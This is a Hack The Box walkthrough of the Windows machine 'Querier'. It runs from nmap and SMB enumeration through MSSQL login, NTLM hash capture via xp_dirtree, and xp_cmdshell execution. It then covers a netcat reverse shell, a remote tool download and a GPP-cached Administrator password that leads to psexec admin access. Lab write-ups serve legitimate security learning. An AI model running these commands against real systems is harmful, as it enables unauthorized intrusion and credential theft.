Hackthebox - Querier

  • Windows


sudo nmap -T4 -sC -sV -O -Pn -p-              

Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-22 05:32 EDT
Nmap scan report for
Host is up (0.022s latency).
Not shown: 65521 closed tcp ports (reset)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-09-22T09:30:42
|_Not valid after:  2052-09-22T09:30:42
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
|_ssl-date: 2022-09-22T09:34:35+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-09-22T09:34:31
|_  start_date: N/A
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.26 seconds


  • Let's try to list the shares

└─$ smbclient -L \\                                                                                                                                                                                                          1 ⨯
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • Let's try to connect to Reports. It works

Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 28 18:23:48 2019
  ..                                  D        0  Mon Jan 28 18:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 17:21:34 2019

                6469119 blocks of size 4096. 1611307 blocks available
smb: \> get Currency Volume Report.xlsm 
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Currency
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (76.6 KiloBytes/sec) (average 76.6 KiloBytes/sec)

MS-SQL Server

  • We can connect with mssqlclient.py from impacket

  • Note: I was struggling with the impacket command turns out that in order to work the password neeeds to have not double quotes or no quotes BUT single quotes (seems to be because of the dollar sign in the pass)

  • python3 /opt/impacket/examples/mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@ -windows-auth

  • We get a shell this way

  • We do not have enough rights to create a user

  • Itried this for cmd execution but it is not working

xp_cmdshell {'whoami'}
EXEC master..xp_CMDShell 'whoami'
  • Ok we do not have much permissions we should check another way.

  • We can try something like this on Mark Mo's blog

  • Let's create a directory in our attacking machine mkdir querysmb

  • Now we just need to do the exec command to drop the hash exec xp_dirtree '\\\myshare\'

  • Let's check our permissions with this user SELECT * FROM fn_my_permissions(NULL, 'SERVER');

  • We have many more than previously

  • Seems like we could event try xp_cmdshell again

SQL> EXEC master..xp_CMDShell 'whoami';
[-] ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
  • We can get the user flag EXEC master..xp_CMDShell 'type C:\Users\mssql-svc\Desktop\user.txt';

  • Let's get nc.exe in our target python3 -m http.server 80

  • EXEC master..xp_CMDShell 'curl.exe -o C:\Users\mssql-svc\Desktop\nc.exe' we get it

  • EXEC master..xp_CMDShell 'dir C:\Users\mssql-svc\Desktop\' we check that it worked

  • We set a listener rlwrap nc -lvp 4444

  • EXEC master..xp_CMDShell 'C:\Users\mssql-svc\Desktop\nc.exe -e cmd.exe 4444'


  • systeminfo

  • Let's use wes to see what exploit we could use python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability" I will grep a few lines before and after to have the whole cve info

  • I also want to try PowerUp before using any kernel exploit

  • curl.exe -o C:\Users\mssql-svc\Desktop\powerup.ps1

  • powershell -ep bypass

  • Import-Module .\PowerUp.ps1

  • Invoke-AllChecks | Out-String -Width 4096

Privilege   : SeImpersonatePrivilege
TokenHandle : 2144
ProcessId   : 3456
Name        : 3456
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files
  • We have a clear password for the Administrator MyUnclesAreMarioAndLuigi!!1!

  • python3 /opt/impacket/examples/psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@

  • We have an admin shell we can grab the final flag! type C:\Users\Administrator\Desktop\root.txt

Last updated